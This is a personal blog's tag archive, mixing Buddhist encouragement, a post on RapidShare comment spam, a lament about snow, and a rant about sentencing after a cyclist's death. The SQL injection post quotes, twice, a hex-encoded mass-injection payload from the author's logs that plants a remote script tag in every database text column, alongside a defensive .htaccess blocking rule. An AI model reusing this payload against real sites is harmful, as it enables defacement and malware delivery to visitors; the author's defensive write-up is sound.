Tag Archive: HURRY

Peace, Culture, Education

—- DAILY ENCOURAGEMENT —-

“Of course, you’re free to live your lives how you like, but don’t forget the fundamental path of life.

“The Soka Gakkai teaches us this fundamental path–a path for accumulating good fortune, helping others, and working for peace. That’s why we now have so many members around the world, and why our numbers continue to grow steadily. Support and praise for our movement promoting peace, culture, and education is spreading across the globe, transcending all boundaries and divisions.

“Nichiren Daishonin expounded his teaching for the eternal future. There’s no need for us to rush or hurry. All the pieces are in place. The tide of history is moving in the direction of humanism. With profound conviction in this truth, please advance with a calm, relaxed, and broad-minded attitude.”

These are Daisaku Ikeda’s words of encouragement for today, Monday, March 1st, 2010.  Fantastic!

Related Posts:

Comments are closed

Rapidshare WordPress Comment Spam

I got an unusual (for me) comment spam this morning at 01:58 from a Kuala Lumpur spammer.  His modus operandi is to trawl WordPress blogs looking for the word “RapidShare” and then dump a deliberately malformed warez-type URL to a zip file promising unlimited super-fast Rapidshare accounts that have been compromised.

I had such a posting quite a while ago here, view-of-local-network-from-rapidshare-a-black-hole, so I’ll be letting the comment through because it’s got no active backlinks and such like.

RapidShare

It’s a file sharing website where users can share files of their own creation or where there isn’t a valid copyright. In the real world, of course, I guess about 99% of it is cracked software and copyright video and music. Some of it is my own and others under the Crawling Chaos moniker.  Bizarrely, you can actually pay a premium if you want better downloads of the ‘free’ stuff in the “premium” service.  But that’s the point, isn’t it?  ;-)

Comment Spammer

And this is where the spammer comes in. The comment and malformed URL is this;

Hey guy's! Check it out.HURRY!
JUST DONT CHANGE THE PASSWORD COZ EVERYBODY ALSO USING IT . Enjoyyyy.

h t t p://rapidshare.com/files/203145031/Rapidshare_Premium_Accounts_-_Latest_Issue.zip

Content

I checked the zip.  There’s a lot of Spanish and English in some text files as word docs in both old and new formats as well as plain text files.  There’s also an MP3 file.  In my sandbox they checked as clean!!  I haven’t gone any deeper into testing the passwords as Rapidshare, while being good in principle, is actually theft and deception in practice.

The spammer’s email checks out in a few on-line mobile phone sales on a Malaysian website. It’s [email protected] but it’s probably spoofed.  With so much secrecy and nefarious activity on the web, who’s to say?

I don’t see it as a benevolent gesture of a thief in a theft based culture.  I see it more as a tester for a bigger plan.  Maybe, send a few of these ‘tasters’ out for a bit before the true malevolence is delivered?  Maybe the dodgy content is in the particular RapidShare accounts that have been compromised or deliberately set up with this purpose in mind?

You’ve been warned!

Related Posts:

Too Much Snow, Too Much White, my eyes, my eyes.

There is a saying of the Buddhist monk Nichiren Daishonin, that

Winter Always Turns to Spring

Those who believe in the Lotus Sutra are as if in winter, but winter always turns to spring. Never, from ancient times on, has anyone heard or seen of winter turning back to autumn. Nor have we ever heard of a believer in the Lotus Sutra who turned into an ordinary person. The sutra reads, “If there are those who hear the Law, then not a one will fail to attain Buddhahood.”

Well I just wish that it’d hurry up because after my recent travels, I’m getting rather fed up with white.  Even though we all know that white is made from all colours as Newton proved with his prisms experiment, I’d just like the opportunity to see some of them some time in the near future!

Austrian Trip Photos

 

Enhanced by Zemanta

Related Posts:

Probable DDOS attack Using SQL Injection on my Websites

Over the last day, my sites have been really slow and twice to my knowledge have tripped out.  I’ve been getting a mysql error message like so when I try to resolve the problem in phpAdmin;

MySQL: ERROR 1040: Too many connections

I tried hosting chat support (as I’m in a hurry) but the connection kept dropping.  During this process Google came to the fore and pushed me down several avenues of investigation.

This was one result, http://rackerhacker.com/2008/06/24/mysql-error-1040-too-many-connections/ from the web, and another from the horse’s mouth http://dev.mysql.com/doc/refman/5.0/en/too-many-connections.html

I then proceeded to check my WordPress plugins but couldn’t because the server wasn’t responding.  When it finally fired back up after quarter of an hour (!), I immediately disabled some OpenID plugins I’ve been playing with on one site and checked my databases were okay.

They were, but during the process I noticed that Wassup was the biggest table – unusually so.  Looking at some of the references in an extended list in the GUI, I noticed that several (random, as far as I could tell), post addresses were extre-e-e-e-e-mely long, terminating in some form of code.  Like so (It’s manually wrapped to fit into my theme);

http://strangelyperfect.tv/68/70s-mixer/?;[email protected]%20

CHAR(4000);[email protected]=CAST(0x4445434C4152452040542

07661726368617228323535292C4043207661726368617

2283430303029204445434C415245205461626C655F437

572736F7220435552534F5220464F522073656C65637420

612E6E616D652C622E6E616D652066726F6D207379736F

626A6563747320612C737973636F6C756D6E7320622077

6865726520612E69643D622E696420616E6420612E7874

7970653D27752720616E642028622E78747970653D3939

206F7220622E78747970653D3335206F7220622E787479

70653D323331206F7220622E78747970653D313637292

04F50454E205461626C655F437572736F7220464554434

8204E4558542046524F4D20205461626C655F437572736

F7220494E544F2040542C4043205748494C45284040464

55443485F5354415455533D302920424547494E206578

65632827757064617465205B272B40542B275D2073657

4205B272B40432B275D3D2727223E3C2F7469746C653E3

C736372697074207372633D22687474703A2F2F777777

302E646F7568756E716E2E636E2F63737273732F772E6A7

3223E3C2F7363726970743E3C212D2D27272B5B272B404

32B275D20776865726520272B40432B27206E6F74206C69

6B6520272725223E3C2F7469746C653E3C73637269707420

7372633D22687474703A2F2F777777302E646F7568756E

716E2E636E2F63737273732F772E6A73223E3C2F7363726

970743E3C212D2D272727294645544348204E455854204

6524F4D20205461626C655F437572736F7220494E544F20

40542C404320454E4420434C4F5345205461626C655F43

7572736F72204445414C4C4F43415445205461626C655F

437572736F72%20AS%20CHAR(4000));EXEC(@S);  (addendum: clickable link removed as I’m using this plugin now)

If you copy & paste and try the link it won’t work now (read on for later ;-) ) but the correct link here does;

http://strangelyperfect.tv/68/70s-mixer/

Before my fix, the first link took the user to the correct page and it displayed in the browser address bar with the long link.  My suspicions were now being raised because the page displayed okay.  This must be all the WordPress updating I’ve done.  It was a couple of updates back the the thing had some SQL Injection resistance built in.  It appears to fall over gracefully by ignoring duff requests.

So I chucked the “extra” part of the link into Google like so.   There are over 6k hits.

These posts got me thinking:

http://www.unsoughtinput.com/index.php/2006/11/09/comment-spam-deluge-did-our-captcha-get-hacked/

http://treyford.wordpress.com/2008/04/30/scary-mass-sql-attack/

http://www.thejoyofcode.com/Stop_trying_to_hack_me.aspx

and a neat fix that I’ve implemented I found here.

http://www.ravenphpscripts.com/postp122652.html (link removed as they’ve gone a bit funny all of a sudden)

What I’ve done is added the suggested code to my .htaccess file, like so:

# Added, protect from SQL Injection (sourced from) http://www.ravenphpscripts.com/postp122652.html
RewriteEngine On
RewriteCond %{QUERY_STRING} ^.+DECLARE(%20)+@ [NC]
RewriteRule ^.* – [F,L]

This has done the trick.  Anything banging into my site with that in the string, is rejected.  I haven’t implemented a polite screen.  It just gets the standard response from my host as you’d have found with the first of my links above.

It’ll probably need twiddling in future but it’s okay for now.

Another similar link was:

http://strangelyperfect.tv/287/finally-a-bit-more-on-the-air-powered-car-from-guy-negre/

/?;[email protected]%20CHAR(4000);[email protected]=CAST(0x4445434

C415245204054207661726368617228323535292C4043207

6617263686172283430303029204445434C4152452054616

26C655F437572736F7220435552534F5220464F522073656C

65637420612E6E616D652C622E6E616D652066726F6D2073

79736F626A6563747320612C737973636F6C756D6E732062

20776865726520612E69643D622E696420616E6420612E78

747970653D27752720616E642028622E78747970653D3939

206F7220622E78747970653D3335206F7220622E787479706

53D323331206F7220622E78747970653D31363729204F5045

4E205461626C655F437572736F72204645544348204E45585

42046524F4D20205461626C655F437572736F7220494E544F

2040542C4043205748494C4528404046455443485F535441

5455533D302920424547494E206578656328277570646174

65205B272B40542B275D20736574205B272B40432B275D3D

2727223E3C2F7469746C653E3C736372697074207372633D

22687474703A2F2F777777302E646F7568756E716E2E636E2

F63737273732F772E6A73223E3C2F7363726970743E3C212D

2D27272B5B272B40432B275D20776865726520272B40432B

27206E6F74206C696B6520272725223E3C2F7469746C653E3

C736372697074207372633D22687474703A2F2F777777302

E646F7568756E716E2E636E2F63737273732F772E6A73223E

3C2F7363726970743E3C212D2D272727294645544348204E

4558542046524F4D20205461626C655F437572736F722049

4E544F2040542C404320454E4420434C4F5345205461626C

655F437572736F72204445414C4C4F43415445205461626C6

55F437572736F72%20AS%20CHAR(4000));EXEC(@S);

which should point to:

http://strangelyperfect.tv/287/finally-a-bit-more-on-the-air-powered-car-from-guy-negre/

This was especially troublesome as the post title was long anyway so it looked in the browser address bar that everything was okay!

Related Posts:

People Are Mad, Not Cyclists; Extra Information #2

Following on from these two previous posts where I mentioned the laughable penalties for killing someone who happens to be riding a bike and the weasely excuses, I hate to say that it’s another case of

I told you so…

£500 fine and 6 month ban for killing someone…

Family attacks cyclist crash fine

@AmazonThis was the BBC headline covering the fact that van driver Robert McTaggart, 36,managed to persuade the court that he “didn’t see” the cyclist.

This was no ordinary cyclist either.  This was a record holder with a very good chance of winning a medal at the Olympic games starting today…  He was Jason MacIntyre.

  • Now Jason, being a professional cyclist, would have had a lot of experience falling off and being hurt in his highly competitive sport, and also, would be used to avoiding collisions.
  • To do his sport at that level he would have to do a horrendous amount of training, much of it on public roads.

This is what was said in the van driver McTaggart’s defence;

The cyclist collided with the truck as it turned in to a junction across the carriageway, the court heard.

Defence solicitor Craig Wood said McTaggart had considered himself a “competent, prudent and careful driver” and added:

“My client simply did not see Mr MacIntyre coming. As a result, the cycle went into the rear of the vehicle and he was tragically killed.”

Now I’m trying to work that one out and the only conclusion I can reach, as it’s happened to me countless times, is that McTaggart overtook MacIntyre on his bike, slammed the brakes on and tried to do a left turn directly in front of the bike, totally misjudging the bike’s speed..

That’s the only way the bike could hit the rear of a moving vehicle.

Weasely McTaggart (“competent, prudent and careful driver” claimed his solicitor), said he “thought” that MacIntyre was “probably” on the cycle path..  These are not the words of someone who is competent, careful or prudent.  These are the weasel words of someone in a hurry who misjudged everything.

How?

  • A following witness (driver), said the bike was doing about 30mph (MacIntyre was a record holder you know), and another witness said that they’d slowed down as had McTaggart, having seen the cyclist for a full 16 seconds! Even the police said this…
  • So a witness saw McTaggart slow down for the bike and therefore, McTaggart did see the bicycle.
  • Also, I’ve tried to cycle at 30mph on our local cycle paths – it’s worse than dangerous; see my past postings.  I seriously doubt an athlete in training would use cycle paths because of the danger, inconvenience at maintaining a good pace, roughness, glass and obstacles.

So I’m in total agreement with the obviously upset family of MacIntyre who quite naturally, and accurately in my opinion, wanted Robert McTaggart prosecuted on charges of culpable homicide, or causing death by dangerous driving.  Despite being upset, MacIntyre’s dad, David said,

“We are of the view that McTaggart should have been facing charges of culpable homicide or causing death by dangerous driving.”

He claimed that the local procurator-fiscal recommended dangerous driving charges but that the Crown Office downgraded the charge to careless driving, despite an appeal from the family.

“The Crown Office view is that this standard of driving falls below normal standards. We are of the view that this standard of driving falls far below normal standards and is deserving of a more serious charge.”

He refused to accept that to drive along a road unaware of oncoming traffic for 16 seconds, to cross in front of oncoming traffic thereby causing death, amounted only to careless driving. That the Crown Office did, he said, “was a terrifying indictment on our society”. – quoted from The Herald.

500 quid….  And on the same day, is another.

Quoting directly from The Herald again, here,

41-year-old firefighter Garry Trotter, who was “solely to blame” for a crash which killed 51-year-old deaf driver John McIntosh, was allowed to keep his licence by a sheriff.

Trotter, who had been driving a fire tender to an emergency call in Bo’ness, West Lothian, was originally charged with causing death by dangerous driving. However, he was convicted of a reduced charge of driving carelessly, over the speed limit, failing to give way and driving through a red light. He was fined £750 and had his licence endorsed with six penalty points.

It was apparently an emergency, but you know, now there’s another.  Suppose the ambulance speeding to help Mr McIntosh knocked someone else over….

….and so it goes on.  Someone must take responsibility for this shit instead of continually looking for get-outs.

Links:

flying-highlander-dies-on-tragic-a82

http://news.scotsman.com

http://www.timesonline.co.uk

http://www.heraldscotland.com/

http://news.stv.tv/

http://www.bikeradar.com/

http://www.heraldscotland.com/news/news/display.var.2420753.0.Anger_over_delay_to_new_road_death_law_as_two_avoid_jail.php

Related Posts:

Comments are closed

© 2007-2017 Strangely Perfect All Rights Reserved -- Copyright notice by me